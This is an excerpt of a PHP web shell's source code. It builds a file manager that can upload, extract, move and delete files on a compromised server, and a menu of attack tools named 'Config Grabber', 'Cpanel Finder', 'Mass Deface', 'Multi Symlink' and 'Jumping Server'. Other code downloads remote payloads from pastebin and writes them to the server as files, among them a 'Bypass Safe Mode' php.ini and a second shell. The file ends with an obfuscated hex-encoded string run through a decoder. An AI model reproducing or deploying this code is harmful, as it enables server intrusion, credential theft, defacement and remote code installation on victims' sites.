2029.                                 $zip->extractTo($GLOBALS['cwd']);
2030.                                 $zip->close();
2031.                             }
2032.                         }
2033.                     }
2034.                 } elseif($_COOKIE['act'] == 'tar') {
2035.                     chdir($_COOKIE['location']);
2036.                     $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
2037.                     ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
2038.                     chdir($GLOBALS['cwd']);
2039.                 }
2040.                 unset($_COOKIE['msv5']);
2041.                 setcookie('msv5', '', time() - 3600);
2042.                 break;
2043.             default:
2044.                 if(!empty($_COEG['hcx'])) {
2045.                     vb('act', $_COEG['hcx']);
2046.                     vb('msv5', serialize(@$_COEG['msv5']));
2047.                     vb('location', @$_COEG['location']);
2048.                 }
2049.                 break;
2050.         }
2051.     }
2052. vars('<script>function m1s(){
2053. if(document.getElementById("act").value == ""){');
2054.    s('Select Action !!');
2055.     vars('  return false;
2056.    }
2057.    document.getElementById("sks").submit();
2058.  }
2059. </script>');
2060. vars('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
2061. vars('<div class="coL-panel"><table>
2062. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>');
2063.        
2064.     $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
2065.     if($dirContent === false) {
2066.         vars('<script>c("?'.x7.'error&'.x5.$dir.'");</script>');
2067. return;
2068. }
2069.     global $sort;
2070.     $sort = array('name', 1);
2071.     if(!empty($_COEG['hcx'])) {
2072.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
2073.             $sort = array($match[1], (int)$match[2]);
2074.     }
2075. vars('<script language="JavaScript">
2076. function toggle(source) {
2077.  checkboxes = document.getElementsByName("msv5[]");
2078.  for(var i=0, n=checkboxes.length;i<n;i++) {
2079.    checkboxes[i].checked = source.checked;
2080.  }
2081. }
2082. </script>');
2083. vars('<table class="table-file" cellspacing="0">
2084. <th class="th-file">Name</th>
2085. <th class="th-file" style="width:80px">Size</th>
2086. <th class="th-file" style="width:65px">Action</th>
2087. <th class="th-file"></th>
2088. <tr>');
2089. $dir = getcwd();
2090. $scn = scandir($dir);
2091.         foreach($scn as $dirx) {
2092.         $dtype = filetype("$dir/$dirx");
2093.  if(!is_dir("$dir/$dirx")) continue;
2094.             if($dirx === '..') {
2095.                 $href = '<a class="a" onclick=\'c("?'.x5.dirname($dir).'")\'>'.$dirx.'</a>';
2096.             }
2097. elseif($dirx === '.') {
2098.                 $href = '<a class="a" onclick=\'c("?'.x5.$dir.'")\'>'.$dirx.'</a>';
2099.             } else {
2100.                 $href = '<a class="a" onclick=\'c("?dir='.$dir.'/'.$dirx.'")\'>'.$dirx.'</a>';
2101.             }
2102.             if($dirx === '.' || $dirx === '..') {
2103.                 $d_zx = "<font color='#ddd'>--</font>";
2104.                 $ckh = '<input type="checkbox" disabled>';
2105.             } else {
2106.                 $d_zx = '<a class="a" onclick=\'c("?'.x7.'upload&'.x5.$dir.'/'.$dirx.'")\'>U</a> |
2107. <a class="a" onclick=\'c("?'.x7.'renadir&'.x5.$dir.'/'.$dirx.'")\'>R</a> | <a class="a" onclick=\'c("?'.x7.'deledir&'.x5.$dir.'/'.$dirx.'")\'>D</a>';
2108.                 $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
2109.             }
2110.  echo "<tr class='ex-hov'>";
2111.             echo "<td class='td-file break'><i class='fa fa-folder-o'></i>&nbsp;[ $href
2112. ]</td>";
2113.     echo "<td align='center' class='td-file'><center>--</center></th>";
2114.     echo "<td align='center' class='td-file'>$d_zx</td>";
2115.     echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
2116.         }
2117.         echo "</tr>";
2118. foreach($scn as $file) {
2119.             $ftype = filetype("$dir/$file");
2120.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2121.             $size = filesize("$dir/$file")/1024;
2122.             $size = round($size,3);
2123.             if($size > 1024) {
2124.                 $size = round($size/1024,2). 'MB';
2125.             } else {
2126.                 $size = $size. 'KB';
2127.             }
2128.             if(!is_file("$dir/$file")) continue;
2129.             echo "<tr class='ex-hov'>";
2130.             echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i>&nbsp;<a class="a" onclick="c(\'?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'\')">'.$file.'</a></td>';
2131.             echo "<td align='center' class='td-file'>$size</td>";
2132.             echo "<td align='center' class='td-file'>";
2133.             echo '<a class="a" onclick=\'c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$file.'")\'>OPEN</a></td>';
2134.             vars("<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>");
2135. }
2136.     vars("</table><table style='width:100%;margin-top:2px' cellspacing='0'>
2137. <td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
2138.    <input type=hidden name=ne value=''>
2139.    <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
2140.    <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
2141.    <td style='width:70%'><select name='hcx' style='width:100%' id='act'>");
2142.  if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
2143.     vars("<option value='paste'>Paste</option>");
2144.     vars("<option value=''>-- Select Action --</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
2145. if(class_exists('ZipArchive'))
2146.     vars("<option value='zip'>Compress (.zip)</option>");
2147.     vars("</select></td>");
2148.     if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
2149.     vars("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
2150.     vars("<td style='width:20%;text-align:right'><button type='submit' onclick='m1s(); return false;' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></form></table>");
2151.    if(isset($_COEG['ndir'])) {
2152.     $cdir = $_COEG['newinput'];
2153.     if (is_dir($dir.'/'.$cdir)) {
2154. error('Directory Already Exist !!');
2155.     } else {
2156.         if(mkdir($dir.'/'.$cdir, 0777)) {
2157.     vars('<script>c("?'.x5.$dir.'");</script>');;
2158.         } else {
2159. error('Can\'t Create Directory !!');  } } }
2160. if(isset($_COEG['nfil'])) {
2161.     $cfile = $_COEG['newinput'];
2162.     if (file_exists($dir.'/'.$cfile)) {
2163.   error('File Already Exist !!');
2164.     } else {
2165.         if(fopen($dir.'/'.$cfile, "w+")) {
2166.       vars('<script>c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$cfile.'");</script>');
2167.         } else {
2168. error('Can\'t Create File !!');
2169.         }
2170.     }
2171. }
2172. vars('<script language="Javascript">
2173.         function cog(){
2174. if(document.forms[\'new\'].newinput.value === "") {');
2175.     s('Can\'t Be Empty !!');
2176.     vars('return false;
2177.     }
2178. }
2179. </script>');
2180. vars('<script type="text/javascript">
2181. function valid(field) {
2182.        var re = /^[0-9-A-z.]*$/;
2183.        if (!re.test(field.value)) {');
2184.             s('Invalid Name !!');
2185.             vars('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
2186.        }
2187.    }
2188. </script>');
2189.     vars('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
2190.     <td>
2191. <input type="text" name="newinput" onkeyup="valid(this);"></td>
2192. <td><button type="submit" class="btn-exe" name="ndir" onclick="return cog();"><i class="fa fa-circle-thin"></i></button></td>
2193. <td><button type="submit" class="btn-exe" name="nfil" onclick="return cog();"><i class="fa fa-circle-thin"></i></button></td></form></table>');
2194. }
2195.  
2196. vars('<hr></div>');
2197. vars('<div class="coR">
2198.            <div class="coR-panel"><table>
2199. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">TOOLS</td></table></div><div class="tools-content">');
2200. $path = getcwd();
2201. if(isset($_FILES['data'])) {
2202. if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
2203.     success('File Uploaded !!');
2204.     mtr('?'.x5.$dir);
2205. } else {
2206.     error('Upload Failed !!');
2207.     }
2208. }
2209. echo '<script>function upload(){
2210. if(document.getElementById("up").value == ""){';
2211.       s('Select Your File !!');
2212.    vars('return false;
2213.    }
2214.    document.getElementById("%").submit();
2215.  }
2216. </script>');
2217. vars('<table><td align="center" valign="top" style="width:10%;padding-top:9px"><i class="fa fa-bookmark-o"></i></td>
2218.  
2219. <td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td>
2220.  
2221. <td style="width:20%"><button type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td>
2222.  
2223. </table>');
2224. if(isset($_COEG['x'])) {
2225. $rse = $_COEG['file_name'];
2226. $zip = new ZipArchive ;
2227. if($zip ->open($path.'/'.$rse) === TRUE) {
2228. $zip ->extractTo($path);
2229. $zip ->close();
2230.     success('[ '.$rse.' ] Extracted !!');
2231.     mtr('?'.x5.$dir);
2232. } else {
2233.     error('Permission Denied !!');
2234.     }
2235. }
2236. vars('<script>function unzip(){
2237. if(document.getElementById("u").value == ""){');
2238.       s('Select File [.zip] !!');
2239.    vars('return false;
2240.    }
2241.    document.getElementById("sks").submit();
2242.  }
2243. </script>');
2244. echo '<hr><table>
2245. <form method="POST" action="?'.x5.$dir.'">
2246. <td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td>
2247. <td style="width:70%"><select name="file_name" id="u">
2248. <option value=""> -- Choose File --</option>';
2249. $scandir = scandir($path);
2250. foreach($scandir as $file){
2251. if(!is_file("$path/$file")) continue;
2252. if(preg_match('/\.zip$/mis',$file)) {
2253. echo '<option>'.$file.'</option>';
2254.     }
2255. }
2256. echo '</select></td><td style="width:20%;text-align:right"><button type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
2257.  
2258. vars('</div>');
2259. vars('<div class="coR-panel top"><table>
2260. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">MENU</td></table></div>
2261. <div class="tools-content">');
2262. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'system&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2263. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'upload&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2264. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Jumping Server</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'jumping&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2265. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Config Grabber</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'config&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2266. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cookies Manager</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'cookie&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2267. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cpanel Finder</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'cpanel&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2268. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Mass Deface</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'massdef&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2269. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Hash</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'multihash&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2270. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Symlink</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'symlink&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2271. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'change&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
2272. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Me : [ <font color="1D9D73">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'kill&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table></div>');
2273.  
2274.  
2275. // --- Create File --- //
2276. vars('<script>function create(){
2277. if(document.getElementById("c").value == ""){');
2278.    s('Select Action !!');
2279.     vars('return false;
2280.    }
2281.    document.getElementById("sks").submit();
2282.  }
2283. </script>');
2284. if($_COEG['op']=="1") {
2285.     if(op('index.php', 'https://pastebin.com/raw/Laz1uRJi')) {
2286.         success('Done !!');
2287.         mtr('?'.x5.$dir);
2288. } else {
2289.         error('Failed !!');
2290.     }
2291. }
2292. if($_COEG['op']=="2") {
2293.     if(op('x.php', 'https://pastebin.com/raw/Laz1uRJi')) {
2294.         success('Done !!');
2295.         mtr('?'.x5.$dir);
2296. } else {
2297.         error('Failed !!');
2298.     }
2299. }
2300. if($_COEG['op']=="3") {
2301.     if(op('.htaccess', 'https://pastebin.com/raw/fRyCn3bQ')) {
2302.         success('Ok !!');
2303.         mtr('?'.x5.$dir);
2304. } else {
2305.         error('Failed !!');
2306.     }
2307. }
2308. if($_COEG['op']=="4") {
2309.     if(op('php.ini', 'https://pastebin.com/raw/gnbXUciS')) {
2310.         success('Done !!');
2311.         mtr('?'.x5.$dir);
2312. } else {
2313.         error('Failed !!');
2314.     }
2315. }
2316. if($_COEG['op']=="5") {
2317.     if(op('adminer.php', 'https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php')) {
2318.         success('Done !!');
2319.         mtr('?'.x5.$dir);
2320. } else {
2321.         error('Failed !!');
2322.     }
2323. }
2324. if($_COEG['op']=="6") {
2325.     if(op('ushell.php', 'https://pastebin.com/raw/M4bJJtBD')) {
2326.         success('Done !!');
2327.         mtr('?'.x5.$dir);
2328. } else {
2329.         error('Failed !!');
2330.     }
2331. }
2332. vars('<div class="tools-content top" style="padding:5px">');
2333. vars('<table>
2334. <form action="?'.x5.$dir.'" method="POST"><td align="center" style="width:10%"><i class="fa fa-bookmark-o"></span></td>
2335. <td style="width:70%"><select name="op" id="c">');
2336. vars('<option value=""> -- Choose File --</option>');
2337. vars('<option value="1">Create [ index.php ]</option>');
2338. vars('<option value="2">Create [ x.php ]</option>');
2339. vars('<option value="3">Security [ .htaccess ]</option>');
2340. vars('<option value="4">Bypass Safe Mode [ php.ini ]</option>');
2341. vars('<option value="5">Adminer [ adminer.php ]</option>');
2342. vars('<option value="6">Underxploit Shell [ ushell.php ]</option>');
2343. vars('</select></td>
2344. <td style="width:20%;text-align:right"><button type="submit" class="btn-exe" onclick="create();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>
2345. </div>');
2346. vars(x("\x76\x63\x4f\x79\x58\x6e\x79\x52\x52\x37\x50\x44\x73\x53\x63\x70\x6b\x73\x6d\x61\x70\x62\x42\x42\x4a\x47\x33\x70\x41\x4f\x71\x61\x6b\x4b\x47\x4a\x38\x48\x64\x55\x52\x44\x45\x53\x78\x4f\x46\x5a\x2f\x5a\x6d\x53\x56\x36\x4d\x73\x5a\x31\x64\x44\x6c\x74\x61\x64\x58\x50\x6f\x73\x56\x72\x2f\x59\x64\x4c\x77\x39\x39\x5a\x52\x39\x46\x6c\x65\x69\x34\x35\x42\x75\x58\x77\x74\x46\x4a\x51\x31\x31\x54\x65\x66\x58\x6c\x56\x6e\x70\x50\x6d\x74\x70\x34\x6b\x56\x33\x5a\x72\x7a\x66\x4d\x39\x72\x48\x33\x31\x7a\x4c\x53\x55\x71\x2b\x79\x56\x75\x75\x4e\x5a\x57\x62\x35\x44\x73\x48\x4f\x45\x69\x74\x79\x63\x32\x71\x48\x78\x49\x30\x5a\x4d\x64\x55\x4f\x53\x2b\x72\x71\x65\x62\x31\x44\x30\x78\x37\x4c\x6a\x73\x3d"));
2347. ?>